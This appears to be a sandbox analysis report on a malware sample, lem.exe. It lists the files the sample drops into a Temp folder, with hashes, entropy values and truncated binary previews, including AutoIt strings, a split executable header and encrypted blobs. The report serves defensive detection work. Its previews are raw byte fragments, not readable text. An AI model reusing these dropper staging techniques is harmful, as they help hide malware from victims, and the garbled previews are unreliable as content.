                                                                        Preview:............l.........;...^...........t3....O;.s*..<.u..B.;.s..A..8.u.............L...A..u......+...1.r.............YL........D.........t..........:.u.GB;.r.........u ..............u...0...............................9X.u....................+p..p.j.....YL.[.D.........j.S..................;.u?.......B....+J.;B.....#.......v..B........8.u.F@C;.r..B.. ...TSQ.......X........y.....\...........;.w..@..t..@.......t..p.................YL..D...t.F.........u.......+...u.....^[.M.3._.i....].j.h..K..,...e..3..u........u............81......%V....Y.e..V.,...Y...}..E.............,...u..}.V.....Y.U..S.].V3...u..Y...........0......hWh....j...*....YY..t=.<...plW.1=...E.YYWj.Wh._B..u.._TV.GX..h.I....w...u"..<.I...W.....Y..t.V..-..Y..._^[].V..x.I....t....j.h..K..+...@<...e...pX.PTY. ....M.....E.QP.`r..YY.e..u.......V."<......t..~..t..v...X.I.V.;..Yj...p.I..U...l:..P..?....Y..u!.u..W:..P..?..YY..u(..<.I.P..p.I..M.Q.AT.BT.AX.BX.A..B..):...>......=.aL..tn.....\$..D$.%....=....u..<$f..$f

                                                                        C:\Users\user\AppData\Local\Temp\Insulin

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\lem.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):51200
                                                                        Entropy (8bit):6.000013914688802
                                                                        Encrypted:false
                                                                        SSDEEP:1536:v0w9/5Sh4ztrgWVrZ+In23SwFc1vtmgMbFuU:v0g/bZaUAg0FuU
                                                                        MD5:0B03EC2247369D1C12C3358DC8CA446D
                                                                        SHA1:F91E66EF206AC9281C0CB01DC2EDAD35B44AD370
                                                                        SHA-256:AC6C5C42C7B866E196C00D91D38C105CE1EC6CEB9D42ED42D19966D3A25C3C5B
                                                                        SHA-512:622241F99D3F6560793B9A63F2EA3FFD877B2C33C4557DD910F46A097FF3B04CE637FD7348B67BB412E5DCE4F5206043DA73F35F87AFDD6FDE2BF99196A9C1DE
                                                                        Malicious:false
                                                                        Preview:_^..]...U..Q...xL.VW...t...xL.......0..3..u...wL.....q...E....u.3..Z.}....xL.tM.E...P.E.P.u...n....t.M...xL.....M....$xL.............u......................_^..]...U... W.}...9.ul..:.uf.E.P.E..0....I..E.E.E.E..E.P.7..p.I..E.E.E..E.E.E.E..E..E.P.7..p.I..E..u..E.E..E..E.P.7..X.I._..]...U..].N\..U.....E.wL.P.E.P.u...m......r....M...xL.S.].V....M.W.0.$xL.....8.......E....u.<.t"...u.<.t....u...t.......u.<.t.<.u..N.........t.W......~8.tB..u.9.t..7..H.I...t..7..L.I...t".$xL..M............<.t....;.....t.2.....j.V..wL..kl....E...t.....x....M..U..E.....wc...G.H..$.'.H....uPRQ.7V.u...wL........=..t......ua.......]...~.;.t........RQ.7..wL.VP..........]..$xL..M.......xP.t.j.j.h.....pP....I..._^[..].........u.......u!......P......Ph.....7....I..M..U.......~.;E.u........RQ.7..wL.VP......p....].S.6....I......[....u..u..7VS.....j..7..\.I......t.j.j.h.....6....I..U.M........SV..wL.......M..U........H..H..H..H...H...H...H.+.H..............................U....xL...xL.SV.u...

                                                                        C:\Users\user\AppData\Local\Temp\Likewise

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\lem.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):9216
                                                                        Entropy (8bit):4.144988478391688
                                                                        Encrypted:false
                                                                        SSDEEP:96:wxaWKdRfSTxmJg4kbqkaTbaxTHqQhx/quRzsJ5zz1jpC82mW+hiclKJRe/fKQ1rJ:kCV6qTb4Ph5qRtFpC82rcx/hQ4v3U+n
                                                                        MD5:14DBCDCA4A0DAD5C96A0AEC4AB29A13D
                                                                        SHA1:33CE868FA8300564119606C55BD4F335300C72F8
                                                                        SHA-256:866F7FFBBFC2F00F20B89C4A00E2AD55F1F89747F85FACD0A0FCACF897D2AB95
                                                                        SHA-512:5B976F18B18FADC24C44620442F45DC05F9104B6B12F943D8243B171425CA733E8FE1D89F4E2A1B7A8F5983A3B45BB398C328D3FDC08779DFED8325839D81265
                                                                        Malicious:false
                                                                        Preview:.w.i.t.h. .n.o. .m.a.t.c.h.i.n.g. .".S.e.l.e.c.t.".o.r. .".S.w.i.t.c.h.". .s.t.a.t.e.m.e.n.t...:.".E.n.d.S.e.l.e.c.t.". .s.t.a.t.e.m.e.n.t. .w.i.t.h. .n.o. .m.a.t.c.h.i.n.g. .".S.e.l.e.c.t.". .s.t.a.t.e.m.e.n.t...O.R.e.c.u.r.s.i.o.n. .l.e.v.e.l. .h.a.s. .b.e.e.n. .e.x.c.e.e.d.e.d. .-. .A.u.t.o.I.t. .w.i.l.l. .q.u.i.t. .t.o. .p.r.e.v.e.n.t. .s.t.a.c.k. .o.v.e.r.f.l.o.w...&.C.a.n.n.o.t. .m.a.k.e. .e.x.i.s.t.i.n.g. .v.a.r.i.a.b.l.e.s. .s.t.a.t.i.c...4.C.a.n.n.o.t. .m.a.k.e. .s.t.a.t.i.c. .v.a.r.i.a.b.l.e.s. .i.n.t.o. .r.e.g.u.l.a.r. .v.a.r.i.a.b.l.e.s.....B.a.d.l.y. .f.o.r.m.a.t.e.d. .E.n.u.m. .s.t.a.t.e.m.e.n.t...3.T.h.i.s. .k.e.y.w.o.r.d. .c.a.n.n.o.t. .b.e. .u.s.e.d. .a.f.t.e.r. .a. .".T.h.e.n.". .k.e.y.w.o.r.d.......0.E.x.p.e.c.t.e.d. .a. .".=.". .o.p.e.r.a.t.o.r. .i.n. .a.s.s.i.g.n.m.e.n.t. .s.t.a.t.e.m.e.n.t...*.I.n.v.a.l.i.d. .k.e.y.w.o.r.d. .a.t. .t.h.e. .s.t.a.r.t. .o.f. .t.h.i.s. .l.i.n.e.....A.r.r.a.y. .m.a.x.i.m.u.m. .s.i.z.e. .e.x.c.e.e.d.e.d...+.".F.u.n.c.". .s.t.a.t.e.m.e.n

                                                                        C:\Users\user\AppData\Local\Temp\Manufacturer

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\lem.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):49152
                                                                        Entropy (8bit):6.7696542532334405
                                                                        Encrypted:false
                                                                        SSDEEP:768:p/ES4KY2lfwMwstd7t+Jv/awuUw1Q37iehoxQeU3ecejLixwghYEYP3iSRWG7O:Z27EM/awuUwU7KxQefixl2vqWWGC
                                                                        MD5:BDFD7B1313DDF10521838BE73E198A18
                                                                        SHA1:C45FBB6B497053E245844753D624CA496FD584EB
                                                                        SHA-256:A14DFC374AE5B1AA23702639B30CB774FA4ED45366491BCFF8BBA53146561657
                                                                        SHA-512:D31E67184C1419A612191460F3BB7075733B04FFDF51C7F1C574D686936FB3BBE91211BEB6FE7ABD4DBDF9E71096669457B1FFA38E0D343B89C6A1581C12894F
                                                                        Malicious:false
                                                                        Preview:......+... ...j.PW......P..(.......YL..4.....I........... ...9. ...|...8.....+.0...;...A.....4.....D...................j.[;........@...............................9u...|...........................j.+......^;E.s3..9......f;.....u...D....f.3......f.;............r........<.....$...+.j... ...PS......P..(.......YL..4.....I...@.....4............. .....@...9. ...........<.......0...+.;E.............]...8.............................H.....8...+......;.s;..7........8...f;.....u.j._f.8.....8......f.0............r.3.......VVhU...Q..H...+..+...P..PVh........I...@.....4.....<...........3..@...j.+... ...RP..........$...P..(.......YL..4.....I...t...@..... .....<.....@...;.......<.I...@.......<.....4...;.........8.....0...+.@...;........w...j... ...R.u...0....4.....I.....=..... ...3..G...W...Y.<..0.....(.....$.......YL..D..@t..:.u.3....v..........7.... ......+..[.M._3.^. .....].U.......P.L.3.E..E.......SV.......E.W.u..}.......3.........................................................

                                                                        C:\Users\user\AppData\Local\Temp\Middle

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\lem.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):16384
                                                                        Entropy (8bit):6.644098830563785
                                                                        Encrypted:false
                                                                        SSDEEP:192:f0HbCNULZhogkx5SgM/L5ORg3BLjtHroiH0uRAFb9gOWZb6njvI8SxvG7boQNsHb:fkXRK5S7njBH0ZngxvkubnOaRCY
                                                                        MD5:1847C2E6AFD6CD4511A3C7DD95956B87
                                                                        SHA1:A81FCC1110C17E38DAE6AEBEA798E104D270BD26
                                                                        SHA-256:F8D6C90704462ADDD02518D5D8D083456F9484370A40DEF5697317F191B74399
                                                                        SHA-512:C64C170A7E15D61F4AD5B596AADB91B82ADEB08BE6FA073B0AD2D289CBBF4BA15FEEDBFB1B2B017462E83F6250BB404F890CAB6B65CBB75CF6223B3D87D72543
                                                                        Malicious:false
                                                                        Preview:].....3.......E..}.B.}..U.t.G.M......M..m..E..E...........M..]..E.u.u.j..]....}.[t.f..f..f.E..u...f.E.....f;.w.............u@.E...u4.E..]...u f.E.......].f;.u.f.M.G..f@f.E...@.E..M...@.E.M......f;.s f.E..}.f.E..E.E.u..M.U.f.}..!3.f9E....H%..........E...u..U.u..}..E..........M....U.u..E..?.....f;.......A.]..M...E..3..]........].}......#.].#.E............}.f;...@....E.f;E...3...f;}...)...f;}.w..]..2...f..u G.E......}.u...u...u.3.f.E......f..u.G.E......}.u..}..u..}..t...M.j..U.X....~X.}..E.<W.E..}..........A..]..<.;.r.;.s.3.@...E..y...t.f...}..E........}.N.E......U..E....BH.U..E......}..u.......f.........]..]...x,.E................E........]......u.f....]..U.j.[f..~[f.M.....f;.w....................E..........E..].........f.E.......].f;.u|.....Gf.E..|.U.......f..y...........E..}..}..E..t.G.]....................M..].U.u.j....u..}.[..M...3.f..@f..f.M..U..<...f@f.E...@.E..u...@.E.....f;.s f.E..}.f.E..E.E.u.U.u.f.}...3.f9E....H%..........E....E...M..E..

                                                                        C:\Users\user\AppData\Local\Temp\Mines

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\lem.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):175
                                                                        Entropy (8bit):4.468423615142461
                                                                        Encrypted:false
                                                                        SSDEEP:3:RywEsV6i9lWUqt/vllpfrYZcFTS9gXeF+X32ZpAo3P8Gn:R4sV6i9HqjvVg3F+X32l/8G
                                                                        MD5:98163F9B1635664A49E5202D477E9F93
                                                                        SHA1:6A518B4FB02672762F0F773F0A79971EAFEE129E
                                                                        SHA-256:A8F6B1F27110519663B2CE7F918F64F43884A6619700621445BA3723D7B965B4
                                                                        SHA-512:1981CE403CD8BE44BA0D9D174316FC93C2935F07698B71C0A8EAE15A830920A790C6B083C88779AEECD6294BC9D15D839D223802F3D45ED8411A81277BFD00B6
                                                                        Malicious:false
                                                                        Preview:TrailersTractOffersVenezuela..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..

                                                                        C:\Users\user\AppData\Local\Temp\Myspace

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\lem.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):10240
                                                                        Entropy (8bit):6.419193287850095
                                                                        Encrypted:false
                                                                        SSDEEP:192:Db5LNS6gCDZT5Bztld8f93tXjRwzHBkt615q/vcEeQblls0Hn30w+r:Db5LKC/B5lyxtX1wzS61I/vHhH30wW
                                                                        MD5:94384F6BC21724F7CCE78A08293A804C
                                                                        SHA1:E6CBD084645381E8A799024F450997A3D3970A0B
                                                                        SHA-256:9696688F7EE46D7A1FB80792C3929B248CCA9780782AAE863D429704639D8703
                                                                        SHA-512:857881EAE72D465D9F82871176A56F015E7D170FD206AF4B2DE8D9B305B8A99E0B0C815C12BDC1F57AE9874FA290B51804C415B32ACBB445C04DA6262743DAEE
                                                                        Malicious:false
                                                                        Preview:.5..L..H...;.......P..;...N...Q.?5...F.......................$.B.C..........P..\.I..6.|...D$@........H..`..........Q.`........p..A/......6.C..........Q.f............|...Q.f....q......D$@....c......U;...t$@.........K....L$..U..P......D$.....L$..U...L$.P.,....B...h..L..L$ .D$......U...E....E..@.....L$..8.@..D$@.LU........k...D$@.F......>.F..u....Rv...5..L..O..:....|......L$..0..U...........r.......$....h.-I..d.L...7......L..0...B....$.....h.L..S:....|...t$..u..u.......L$`...o.......I.........L$h.....}.....QPV..-......t$d.-......}..Q.43...F......z~..........z~...$.n.C.......i~..P..\.I..6.e-......S~........I~..Q.X....>~........4~..Q.^...)~.....p..)-......6..-.......~.........~..Q.C.....}.........}..Q.C.....}...6..t....:9..V..,......t$...}...@..p8..~..Q.U2...T$..F(......~...........~...$...C..F .....}..P..\.I..v .y.N .....}..Q.}....n.N .....}..Q..]...[.F .p..R,......v .@.N .....}..Q.u....5.N .....}..Q.w....".F .D$@....x}.....h8...t$@..,......T$..\}..h..L..L$ .D$.......R..

                                                                        C:\Users\user\AppData\Local\Temp\Nutritional

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\lem.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):64512
                                                                        Entropy (8bit):6.63994737294836
                                                                        Encrypted:false
                                                                        SSDEEP:1536:Gjvj5PiuzNvt5DfExgYR5yiPl/UQ6JP04vDcmrIEVi:mPNGR5yiPlcQ4NvoWVi
                                                                        MD5:D0421AAFF28C59B66BBD9BCB2D7665D3
                                                                        SHA1:AA93E409B032E0BAD51D981FE9C2398A52C257EA
                                                                        SHA-256:8E50C6305AFC5D826D84A45F3770F452191C1E29C4B1A9B9F6B7D8B3FCE31C28
                                                                        SHA-512:E4C60F30EA7869A91B342653DA7BAE4F649B379EE3E63B8000EBD9F55E0E306B50F64835E72F678A5B921BD169B9319603AE79B14D4D89C401DF07D90D78B4FF
                                                                        Malicious:false
                                                                        Preview:...F.;.r.....Q.M.R.u..U..u..h.......E..h...;..........+.@.E..E..@....8.........M.......G;.v.}..E..M..L........;...M......}..C....]....t1;.s.j.Xf.............B..u=3...@f..........B.(;.s.j.Xf....f.2..f.:..u.3.@f..j.X..f.2....................%................}.....g........Y...j0Y;.........R...j9Y;.v_..L..&.....UtE..c..4...j.Y....>..u..E....=......v..E...D....*....G....w... ..@......E..........9].u^.F..u..E....f;E..E.E.r5.E.f;.w*j0.......|.u.k......F....E......Yj9f;.Ys.E..........;U.~{.u...>..8......j0Yj7+.Z@.E...F.f;E.......f;...y............<..E....|..`....N....Zf;.r.j9Zf;.w...N....f;E.s.E...=....0......o...9]... ....F.....E..<t\..'tWj9Xj}Zj.[f;M.u_.N....f..tEj9[j-^f;.t.f;.t.f;E.r.f;.w.......f..u.....u.j.[f..t.f;.t.j...j.[....u.j9.E.....X...].j-Zf9V.u.......]..^..]....f;].j..].[j}Zr1f9E.w+.......?.u.k..j9........F..E....f;E..E.Xs.}..tG...f9.t?.E...9....$....N....j0Zf;.......j9Zf;.........N....f;E.s.......u..E...:........}..t..E.;.~..E...........+..H......

                                                                        C:\Users\user\AppData\Local\Temp\Optimum

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\lem.exe
                                                                        File Type:GTA1 style data (GRX), 8 bit editor graphics
                                                                        Category:dropped
                                                                        Size (bytes):9216
                                                                        Entropy (8bit):6.349863197432006
                                                                        Encrypted:false
                                                                        SSDEEP:192:5PV1Anp9RpPooYgb7xhTMxkcEVIRBKoA/ieLO9jEPp0s:5PV1E9RDr7bQxqIGoAJSts0s
                                                                        MD5:E2979780E0C920B9BF4D6C8D4A2F2795
                                                                        SHA1:EC266375F488085F768EBB57C4DFD820675EB871
                                                                        SHA-256:04BD58BA9616CC3A1D8A4CFF1ABC6D1BA6215C06269812951792D380750DA8A0
                                                                        SHA-512:646618CBD5B38C712BBC11EA073266042620F9A47B4DC68AE0EFCB30A8C6BBAAD2D479FFC8A0CAAAFB41A0EF3619D71EB844C1B17E2E8FDFEF20313D71AB4CF1
                                                                        Malicious:false
                                                                        Preview:"...Q.D$0PV.L$l.+...........D$0.L$....0.@..D$...+.PQS.L$(.1...L$...L$...V..0..j%Yf9.u..F...P..0..j%Yf9.../...V....0..j\Yf9....q...D$.;D$T.......t$.@.L$HVS.D$..+/...D$H.L$DHP..0.......i...q.....q....Et...Gt...X...q....d...q........w$.E..L$..@......j..QQ..$.t$LW.+S.....W.L$ .V3...t$.;s.......;s.|z.M..D$.P.si...L$,..$...L$`..+...L$`..6...L$D..6...D$@..u.P.a*..Y.t$<.W*..Y.D$\..u.P.H*..YW.A*..Y.L$..6.._^3.[..]...Q.ip..j.VS.L$(.=0...t...U....S.].VW.C..0....f...F.....p..C..H..i...X..E..x..v..@..H..i.....M..r+..;..K..xG..xG..+.;..?.E..@..0....f..WS.v..M..-...M..E.P.kh...M...5.._^3.[..].......+....U.........SV.L$..L$`W.)...}..G..0....f...G..^..p.....f...N......3..L$......D$.r&.G..H...h......................L$..D$........o...........QHQ.L$l.D$..).........o..S.L$h.J*.......p...L$,.V*.......8p........p.......5r...\$83..D$...I..|$ .D$$.D$<.D$(.T$...$........$.......L$x.........|$t................;.........$......$......$......$....PR..$....V.t$x.I........$........k.....$......$.....Q

                                                                        C:\Users\user\AppData\Local\Temp\Pending

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\lem.exe
                                                                        File Type:OpenPGP Secret Key
                                                                        Category:dropped
                                                                        Size (bytes):107520
                                                                        Entropy (8bit):7.998447350591972
                                                                        Encrypted:true
                                                                        SSDEEP:3072:jV5Bbus+egRlqu9uPKp4GUatTtqJYHFduC7:x3mfBFUatTLlUC7
                                                                        MD5:48BBD312B082B9720023F8F01C53E277
                                                                        SHA1:36F60723DFC30BD7837F4F8668897AE41951CBB9
                                                                        SHA-256:57B5E786156CAFD3CCFE670DD1F6D73C755E5215AF9B06046E66C8091315F789
                                                                        SHA-512:315FCC0786CAAB40B08B0BF3E47C73AE87D56DF0B4FFF49351A33D344E404F9B2ADD0486860FA1FAC95A638406737EECE2B10F6F6C1678B77C504244B8591BF7
                                                                        Malicious:false
                                                                        Preview:.u...."..QAm..b..n.>.....#..........(.<.._.Ir..-wj;'..|"..u..R....h.-F......."..0?.qH.}..,.....t..k?I$0%.7..&qS.4!gVclT.'i..d+;.@..E....L.h......eQC.O.....D......=..:K....Og.^!...?.}]...c..l.;.....+...z.0..."..&rD.'...2:L....+.H..y...3.....e@..E&... ...Go.My..b.\.|.$NP:>....9.4.Y.{..c.JC.P..."..>]|.^...;c...O......(5...6.G.Y. pQ.......(`A01....U...(..S..r".z.xOy..Q.^.^....8.O..q<..5&..F.Y......H3,.._Wx..9I..M2[.t...qL..w>NkayXcJhE..{H...K^...Z>.J..b...T..*(.../....5..-S..X.w2.,./.a.f.?.0.jc.n.b'mh.P...@.Ap.5..>.=.R.f`...u.........f..."J\ny./.......9&#h..Z.8..@...w.C.>z.z..g!.....S.C .J.p.5.J.w..............I...+..Z.{..D./._.....NEX..2.m..._.....D.*.kh...}].Yz\mx.&.@A...._....$K.=tD.v.E0. V...a....y...u.m...ZI-...5.Q1.g....p.G.W.?s.QX.G....(N..+.XQ*.gU.l..>h....4.@.-.'......z....O..d..b~..-..0;.7.N.N);..h.7.~L*.X.YD ..;.NFx.wC...%.....F.4.n..c........2!y.?..FT2..u.U.D.....A.eH.......rP..I.a'M.e.g...~y..S}...T.th.#..=...Jn..V...._.m..

                                                                        C:\Users\user\AppData\Local\Temp\Plastics

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\lem.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):27648
                                                                        Entropy (8bit):6.901058017462281
                                                                        Encrypted:false
                                                                        SSDEEP:384:CSkXDylnffltltZZzz11ppz9KvLoXM4INduLbbOxiVnoXM4INduLbbOxidDQxah0:CSdK8M4INduPbOUGM4INduPbOU+aI4kB
                                                                        MD5:A908DD9A60B70D5FC683238CA024B902
                                                                        SHA1:B208E336519E64908A25BD68513452344A64FF72
                                                                        SHA-256:DA5FB20B02246A2A1C167321579D3AE997DE9D9A23E6B8D898E6446962893068
                                                                        SHA-512:DF24D066D3083CC78EBEDB15ED355FAF3C7D07A45149C39FCA8E4701FCEC9703A9C84F4E9A1DCC9B3C9B5F6394B45B315CD3E57190C64B153F41E86EEFC68DD3
                                                                        Malicious:false
                                                                        Preview:-J.0.?.6.}\0.<]%>..U.?.A..n/..X.0..y.?.c..~.<..yUk..?1......<z..k..?.l..4.....Z....?..]4..<f..)...?$.L.....O..3.?..0^.b.:Y.rY.?.m...q..G^..v..?:.T~OXu.J..0...?.)T.......K....?..-z.=.<...[...?r.k?.....R....?.HP.e..<z.._.@.?...7E.<K.W..g.?.<H.M..<....m..?D\.H..q<i... ..?.I....u<..]U...?r..S;..|..J-..?.zyC7......./.?w..q{H.......X.?.7[...<......?........2....?2.mi.#.<`...!..?...xW.<_.{3...?[K.O...)...F&.?..z.'....?...P.?......<.L..Qz.?...".<......?.(..#....g.-H..?......'Za....?......<..k7+%.?C......<@En[vP.?...-..<.....{.?.5............?....SH.<.q.+...?.ye.t.b<......8C......8C.......................?.......?................1g....U?.....k.?wN.o...?......?.9..B..?...........@G..................................................................................................fq..@.........@.6C......?.......?.exp............a.B.].C.b.C...C.................5.h!.....?.......?...........................?..5.h!....>@...............................@................c.c.s

                                                                        C:\Users\user\AppData\Local\Temp\Race

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\lem.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):10240
                                                                        Entropy (8bit):6.653168303634218
                                                                        Encrypted:false
                                                                        SSDEEP:192:EEMazNFZqTAHCTfN1BvzTK1/7jLjtWwIf5uoDwoQADgGk7ql20MLkKc93i3L3:EEMa1qTdpjvz+ZvNWvfQoEoQvGkwLMwm
                                                                        MD5:2CABD94C5E53CC162389389819BA859C
                                                                        SHA1:BB2662DEC236636A462E6347BA492B5DE68C6C49
                                                                        SHA-256:B0450F34CBD94FC1C17F8A5E3D8A55B2DD176558E6BDC89655EEDF557322019B
                                                                        SHA-512:4A32DE9EA1A96033DA46A0B65339EF46D18B5B87125F5CD4406D8CEE2CDA3B9FACD3299F9EFA379F1AC1D8B1F197AACCCFBD33A4F55F3A5BE410FDF0AB3C170C
                                                                        Malicious:false
                                                                        Preview:...I......u.2..&9].u.WS...}..Su.SW..WSV....I.V..X.I..._^[].SV....L.W........j.h.HF.V..x.I.S......_^[.U..Vh.............$....V.u...H.I.f.>.t.W...L.V.......h.;I........_V.....Y3.@^]...U......T...V..V....I....u .L$.QV....I....u.....P....I..D$.^..].U.....E.SVW....PW..p.I.....u.2.....V.1...YP.E.3.VPW.E...l.I..u.V.[...3...j.Z.........Q.......hL,I.W.....hL,I.V.|..............hX.K.W....hL,I.V.........uj.E.P.E.Phx.K..u...t.I...t,.E..O j..0Vj.Z.F...j.....O(Vj.Z.5....u......h..K.W.D...YYhL,I.W.7...VW.0........VW.$...YYh..K.V....YY..u*j..G PS.&....u.3.f.C.....W..............E.P.E.PW.u...t.I...tXhL,I.V....YY..u).E..P..H....P...Q...P...Rh.K.S.........h.....u.S.......3.f.......E...u......W......E.YY_^[..].U...........V.E...P......Ph.....1..`.I....t%......P.....u..M..~...hL,I..........+....M..#...^..].U..QS..;M.u!V.......E.P.u.SV..`.I.V.p...Y^...E.P.u.SQ..`.I..M......[..].U........h...VWPh............I.........h..........P....I.......P....I...tw.P.3.9.t...@.A.8.u.;.~.h..K.W.q.

                                                                        C:\Users\user\AppData\Local\Temp\Reached

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\lem.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):50176
                                                                        Entropy (8bit):5.830919475362767
                                                                        Encrypted:false
                                                                        SSDEEP:768:qLQEGBoAyGcjXB2SCursGHv7mlHW7nIhp/lNVi6dFiwc/RGNul1Eovu86eV3QKY/:aRGDox2S3hPt8gNpkU5uG3xYwC
                                                                        MD5:1621DF8276C2401CB9232EDC0C203186
                                                                        SHA1:C30B091A82310EBFF8569FDCF7F3ED5826A8184A
                                                                        SHA-256:F726D7A85B020F63BC9D6D35333B1A90FBF71313197251B328C9BA17D70ED7AF
                                                                        SHA-512:7B245BF6FBDE87475DEB30AEE362EEFDE764D6FE7ED94232BA54624548FB1E90294766C28C175642E4A4FAA056CBED0104B5B972D7D64FFCC9BF80BD97516E6D
                                                                        Malicious:false
                                                                        Preview:.C.......... .....{.............C...C.E.....f.;w.......E.............u@3..t....M.E...H.E..E.@.E.;E................wj...E..fm...}..ks........1............3....3...........T.........J.........@....I.m.A...A.%wD.DwD..xD..|D.L}D..}D..~D..~D..~D..{D...A..|D...A.O.D./.D...D..D.d.D...A.vxD.hxD.XxD.UwD.ivD..vD...A...A..D..D...D.s.D.1.A...D..D...D...D.3.D...D.Z.D.c.D.s.D...D...A.x.D.\.D...D...D..D..D...A...D..D.n.D..qD..pD. .A...@.7pD..nD.doD...A..iD.zjD...A.njD..kD.6.A.DsD..sD...D...D...D.L.D.jiD...D...D.m.D...A..nD...A.I.A.......................................... !"#$........ !"#$%%%%%%&&'()*+%%%%%%&&'()*+,,,,,,--./012RRRRRRRRRRRR3345566789::::;<=<=>?>@ABC>@ABCRRRRRDEFGHIJKLMNO..PQ..<.A...D.............U..VW.}...N...t`.~..tZ.?.tU.V.9..N.v$.F4.v .F,P.7R.6.V..........F(....!....F .H..f,..}..t...;P...$......F(_^]...3..........U......SVW........X.........N....].3.j.P...E...E..i....}..u..E...M.......M......3.3..U.u..d$..}.................................v....O.;...k....w$.G4.

                                                                        C:\Users\user\AppData\Local\Temp\Resident

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\lem.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):28004
                                                                        Entropy (8bit):7.993258796246441
                                                                        Encrypted:true
                                                                        SSDEEP:768:3HxbUsrB0QIY1CKrUtXFDgJjdazaQuPQCAeLb0DE:3Hx56tXFojd6aQuPQCMw
                                                                        MD5:448FEDC2A81E25A6D6D0CACE5D7A98F7
                                                                        SHA1:DB6A9DDD0CCCBCA4C7811DCEE2E455A4292BA433
                                                                        SHA-256:76EA29BCB320600E55703872119912DD0135050AAA0680CA01AADC514E5F02EA
                                                                        SHA-512:9C66C61E7AADF2BF8B8D8BCAD20C50C8C24FC1E71FE02E66329F5318815404AF18E08A5CF5B034C97A12583BFFC9D2FE085A7A2819BEF9CD17490A6B82CA83E4
                                                                        Malicious:false
                                                                        Preview:J.i...9.-l.y...>F........d...Cmv...n>.c.....Q.iO....G>....+.FC.h.C..FX..].....>......=8.T.....G..MW...8.j.3.>.Gv......7...;...............6..>.!....e..4...0).l.}...3.`.{R.....E..%..r.m{..C...p.MTw_v.\t.........L..i`V...Q..o.....VIBt....y.....|`./3C,e>.7.<.......u...h/Bv.%kq.j....?^*.ah...Dq.o(.vS.4.7.........I...oHa.t$.........W;.....v...l.z...}....Y.h...../.....M........fA...f.{wq@.....D.....}.j..97.@Z.?..u... `.......@C. j..d*....4.....T..e....*.o.H..4..6"...Ykd..(.....z*./.]qP....K.Z.L-q...FNn.Z..F.s...&...R...+...1D.p.<.....Ab....u...<......-.....|o...xD.w...w..j...s4.[..Xc[.......<.nb.....+e...Vww..x7......3....=...G.dt?..V.EN.8..EHsp....zZQ..L...si......S..Q..r#QE2...n....u......5.?Tk.`.|].....sL.9..Zp]...rp}-9.......7o.+....`...^.J%...C:`...2..0..3t...E.I.g.1.d......-.*.slk+H...w..P....o.k....:]Bh......:;.k....D..J.+z...,....j.HU.Y..C..B.......Gvw-U.itO...........z^@R...Y..z.tC.........2H\.......4_^.M=`..'..zS.E.Q.4PK[.e)....E..

                                                                        C:\Users\user\AppData\Local\Temp\Residents

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\lem.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):58368
                                                                        Entropy (8bit):4.377576762014684
                                                                        Encrypted:false
                                                                        SSDEEP:768:n+AGWBA60iPTcf4qSq25N8EH/i6mxyyM0Dj2Bmgari07L:n+l6JPTcUNx6/xhgariw
                                                                        MD5:EDDFB49B0A039B165EFE06E33EDF37AD
                                                                        SHA1:7E8C72B8CDB6806EF869C6BCA371B937DD3738B8
                                                                        SHA-256:E0DC90C531C6863D456FA03DBFAC4153F95C7841C898F9D8841C5A909A09DDAC
                                                                        SHA-512:B4B66592864D00448AE3E343A5676EBAD5A8FA5F6398CCF936D4CF9C24E8AE0DDA0C51D119661CE0217AA1EA8DDFEEB97B384022ACBB94DD9FB828AE6FE534F7
                                                                        Malicious:false
                                                                        Preview:...............................................................................................................____....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\Secret

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\lem.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):47104
                                                                        Entropy (8bit):4.6373154655906985
                                                                        Encrypted:false
                                                                        SSDEEP:384:0QXoSpu88888888888888888888888888888zv888888NfU84444QnoooooooooT:Dx/SW
                                                                        MD5:80FE93BA081BCD2EC189D029501878CA
                                                                        SHA1:6F7C3C2DD53899273C87869F237F928B469E48E0
                                                                        SHA-256:995D1B705D45492BD720B1DBE3F74D37F6E0D700B65B28FEBB13BB3FA3F96DAA
                                                                        SHA-512:E5C3CC83AFDFEFA1D1ED81D08767E5D37860CCC7CA98633BFD76E958E016D7F911E554F32AF4D747F98EA33AA8E235359711FCF3564C0AE2B00D9CBCD76BDE59
                                                                        Malicious:false
